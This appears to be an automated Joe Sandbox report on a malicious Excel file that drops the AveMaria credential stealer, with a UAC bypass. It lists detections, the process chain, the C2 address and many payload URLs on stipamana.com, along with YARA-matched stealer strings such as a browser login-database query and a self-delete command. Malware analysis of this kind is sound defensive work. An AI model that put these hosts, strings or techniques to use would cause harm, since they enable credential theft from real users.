Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Pago.xls

Overview

General Information

Sample name:Pago.xls
Analysis ID:1575112
MD5:fcf8455b5da351650ed2e3c7d560d76e
SHA1:e8e8b2be3a8c6bcf4a875671c468eb1dae630111
SHA256:f945161c3ba134c15554ef6dab1300ce6991e341d83bae157117072660533364
Tags:xlsuser-abuse_ch
Infos:

Detection

AveMaria, UACMe
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Office product drops script at suspicious location
System process connects to network (likely due to code injection or exploit)
Yara detected AveMaria stealer
Yara detected UACMe UAC Bypass tool
C2 URLs / IPs found in malware configuration
Contains functionality to hide user accounts
Document contains VBA stomped code (only p-code) potentially bypassing AV detection
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with functions possibly related to ADO stream file operations
Document contains an embedded VBA with functions possibly related to HTTP operations
Document contains an embedded VBA with hexadecimal encoded strings
Document exploit detected (process start blacklist hit)
Machine Learning detection for dropped file
Machine Learning detection for sample
Microsoft Office drops suspicious files
Office process drops PE file
Sigma detected: File With Uncommon Extension Created By An Office Application
Sigma detected: Script Initiated Connection to Non-Local Network
Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to call native functions
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Installs a raw input device (often for capturing keystrokes)
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Excel Network Connections
Sigma detected: Script Initiated Connection
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 3168 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • wscript.exe (PID: 3404 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" MD5: 045451FA238A75305CC26AC982472367)
  • WINWORD.EXE (PID: 3460 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • NXRWIG.exe (PID: 3796 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" MD5: 3871A95491C97785A2CBA0C068A9ED4E)
      • NXRWIG.exe (PID: 3820 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe MD5: 3871A95491C97785A2CBA0C068A9ED4E)
      • NXRWIG.exe (PID: 3828 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe MD5: 3871A95491C97785A2CBA0C068A9ED4E)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Ave Maria, AveMariaRAT, avemariaInformation stealer which uses AutoIT for wrapping.
  • Anunak
https://malpedia.caad.fkie.fraunhofer.de/details/win.ave_maria
NameDescriptionAttributionBlogpost URLsLink
UACMeA toolkit maintained by hfiref0x which incorporates numerous UAC bypass techniques for Windows 7 - Windows 10. Typically, components of this tool are stripped out and reused by malicious actors.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.uacme

Malware Configuration

Threatname: AveMaria

{"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
    00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
        00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_AveMaria_31d2bce9unknownunknown
        • 0x2d5d90:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
        • 0x2f5cd4:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
        • 0x2d45d8:$a2: SMTP Password
        • 0x2f451c:$a2: SMTP Password
        • 0x2d3818:$a3: select signon_realm, origin_url, username_value, password_value from logins
        • 0x2f375c:$a3: select signon_realm, origin_url, username_value, password_value from logins
        • 0x2d8a60:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x2f8998:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
        • 0x2d5c98:$a5: for /F "usebackq tokens=*" %%A in ("
        • 0x2f5bdc:$a5: for /F "usebackq tokens=*" %%A in ("
        • 0x2d4008:$a6: \Torch\User Data\Default\Login Data
        • 0x2f3f4c:$a6: \Torch\User Data\Default\Login Data
        • 0x2d8b80:$a7: /n:%temp%\ellocnak.xml
        • 0x2f8ab8:$a7: /n:%temp%\ellocnak.xml
        • 0x2d4b74:$a8: "os_crypt":{"encrypted_key":"
        • 0x2f4ab8:$a8: "os_crypt":{"encrypted_key":"
        • 0x2d8bb0:$a9: Hey I'm Admin
        • 0x2f8ae8:$a9: Hey I'm Admin
        • 0x2d44a0:$a10: \logins.json
        • 0x2f43e4:$a10: \logins.json
        • 0x2d4aec:$a11: Accounts\Account.rec0
        00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
          Click to see the 5 entries

          Unpacked PEs

          SourceRuleDescriptionAuthorStrings
          8.2.NXRWIG.exe.351d400.3.unpackJoeSecurity_UACMeYara detected UACMe UAC Bypass toolJoe Security
            8.2.NXRWIG.exe.351d400.3.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              8.2.NXRWIG.exe.351d400.3.unpackJoeSecurity_AveMariaYara detected AveMaria stealerJoe Security
                8.2.NXRWIG.exe.351d400.3.unpackWindows_Trojan_AveMaria_31d2bce9unknownunknown
                • 0x15a30:$a1: cmd.exe /C ping 1.2.3.4 -n 2 -w 1000 > Nul & Del /f /q
                • 0x14278:$a2: SMTP Password
                • 0x134b8:$a3: select signon_realm, origin_url, username_value, password_value from logins
                • 0x17ff0:$a4: Elevation:Administrator!new:{3ad05575-8857-4850-9277-11b85bdb8e09}
                • 0x15938:$a5: for /F "usebackq tokens=*" %%A in ("
                • 0x13ca8:$a6: \Torch\User Data\Default\Login Data
                • 0x18110:$a7: /n:%temp%\ellocnak.xml
                • 0x14814:$a8: "os_crypt":{"encrypted_key":"
                • 0x18140:$a9: Hey I'm Admin
                • 0x14140:$a10: \logins.json
                • 0x1478c:$a11: Accounts\Account.rec0
                • 0x13050:$a12: warzone160
                • 0x156e0:$a13: Ave_Maria Stealer OpenSource github Link: https://github.com/syohex/java-simple-mine-sweeper
                8.2.NXRWIG.exe.351d400.3.unpackMAL_Envrial_Jan18_1Detects Encrial credential stealer malwareFlorian Roth
                • 0x138e8:$a1: \Opera Software\Opera Stable\Login Data
                • 0x13c10:$a2: \Comodo\Dragon\User Data\Default\Login Data
                • 0x13558:$a3: \Google\Chrome\User Data\Default\Login Data
                Click to see the 23 entries

                Sigma Signatures

                System Summary

                barindex
                Sigma detected: File With Uncommon Extension Created By An Office Application
                Source: File createdAuthor: Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\cfhxdfhgjsxgfhxz[1].vbs
                Sigma detected: Script Initiated Connection to Non-Local Network
                Source: Network ConnectionAuthor: frack113, Florian Roth: Data: DestinationIp: 87.121.86.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                Sigma detected: Suspicious Binary In User Directory Spawned From Office Application
                Source: Process startedAuthor: Jason Lynch: Data: Command: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" , CommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe, NewProcessName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe, OriginalFileName: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ParentProcessId: 3460, ParentProcessName: WINWORD.EXE, ProcessCommandLine: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exe" , ProcessId: 3796, ProcessName: NXRWIG.exe
                Sigma detected: Suspicious Microsoft Office Child Process
                Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3168, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , ProcessId: 3404, ProcessName: wscript.exe
                Sigma detected: WScript or CScript Dropper
                Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3168, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , ProcessId: 3404, ProcessName: wscript.exe
                Sigma detected: Excel Network Connections
                Source: Network ConnectionAuthor: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0", Tim Shelton: Data: DestinationIp: 87.121.86.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49161
                Sigma detected: Script Initiated Connection
                Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 87.121.86.205, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\System32\wscript.exe, Initiated: true, ProcessId: 3404, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49162
                Sigma detected: Suspicious Office Outbound Connections
                Source: Network ConnectionAuthor: X__Junior (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49161, EventID: 3, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Initiated: true, ProcessId: 3168, Protocol: tcp, SourceIp: 87.121.86.205, SourceIsIpv6: false, SourcePort: 443
                Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 3168, ParentProcessName: EXCEL.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs" , ProcessId: 3404, ProcessName: wscript.exe
                Sigma detected: Modification of IE Registry Settings
                Source: Registry Key setAuthor: frack113: Data: Details: 46 00 00 00 2A 00 00 00 09 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 00 00 00 C0 A8 02 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 , EventID: 13, EventType: SetValue, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3168, TargetObject: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings
                Sigma detected: Office Macro File Creation
                Source: File createdAuthor: Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE, ProcessId: 3460, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm

                Data Obfuscation

                barindex
                Sigma detected: Office product drops script at suspicious location
                Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ProcessId: 3168, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\VIPMEUV.vbs

                Suricata Signatures

                No Suricata rule has matched

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Pago.xlsAvira: detected
                Antivirus detection for URL or domain
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/sAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjgAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwgAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkcAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghgAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/afdtdzrhszdhthsrthsthstgs/server1_protected.exeAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdsAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Avira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdf6Avira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghg/Sfbuild.docAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdLAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhyAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/vbsfjzbdkjsbgfzskldfbgs/cfhxdfhgjsxgfhxz.vbsAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdh00Avira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/hAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrg3Avira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exZZAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwYAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgLLAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsbAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjfAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/Avira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/stAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknd9Avira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrFAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgsdfjghAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfxAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/doAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfgxAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/eiiAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/wwAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknNAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhyAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjghdskfAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhaAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgweAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfknds$Avira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgtAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqkAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjfsdfkndsjgAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/docjqAvira URL Cloud: Label: malware
                Source: https://www.stipamana.com/exgdhfyjhydsfjhysdgjf/styhagdhgttjwtqwrgwerwg/dAvira URL Cloud: Label: malware
                Antivirus detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\ .docAvira: detection malicious, Label: HEUR/Macro.Downloader.MRDO.Gen
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeAvira: detection malicious, Label: TR/Dropper.Gen
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exeAvira: detection malicious, Label: TR/Dropper.Gen
                Found malware configuration
                Source: 8.2.NXRWIG.exe.3535870.4.raw.unpackMalware Configuration Extractor: AveMaria {"C2 url": "dns.stipamana.com", "port": 5220, "Proxy Port": 27904}
                Multi AV Scanner detection for submitted file
                Source: Pago.xlsReversingLabs: Detection: 47%
                Yara detected AveMaria stealer
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Machine Learning detection for dropped file
                Source: C:\Users\user\AppData\Local\Temp\ .docJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\NXRWIG.exeJoe Sandbox ML: detected
                Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\server1_protected[1].exeJoe Sandbox ML: detected
                Machine Learning detection for sample
                Source: Pago.xlsJoe Sandbox ML: detected

                Exploits

                barindex
                Yara detected UACMe UAC Bypass tool
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.3535870.4.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.351d400.3.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25aa550.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.NXRWIG.exe.25a8ce0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.518315670.00000000022D1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.518698654.00000000032D4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: NXRWIG.exe PID: 3796, type: MEMORYSTR
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49162 version: TLS 1.0
                Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49161 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 87.121.86.205:443 -> 192.168.2.22:49163 version: TLS 1.2
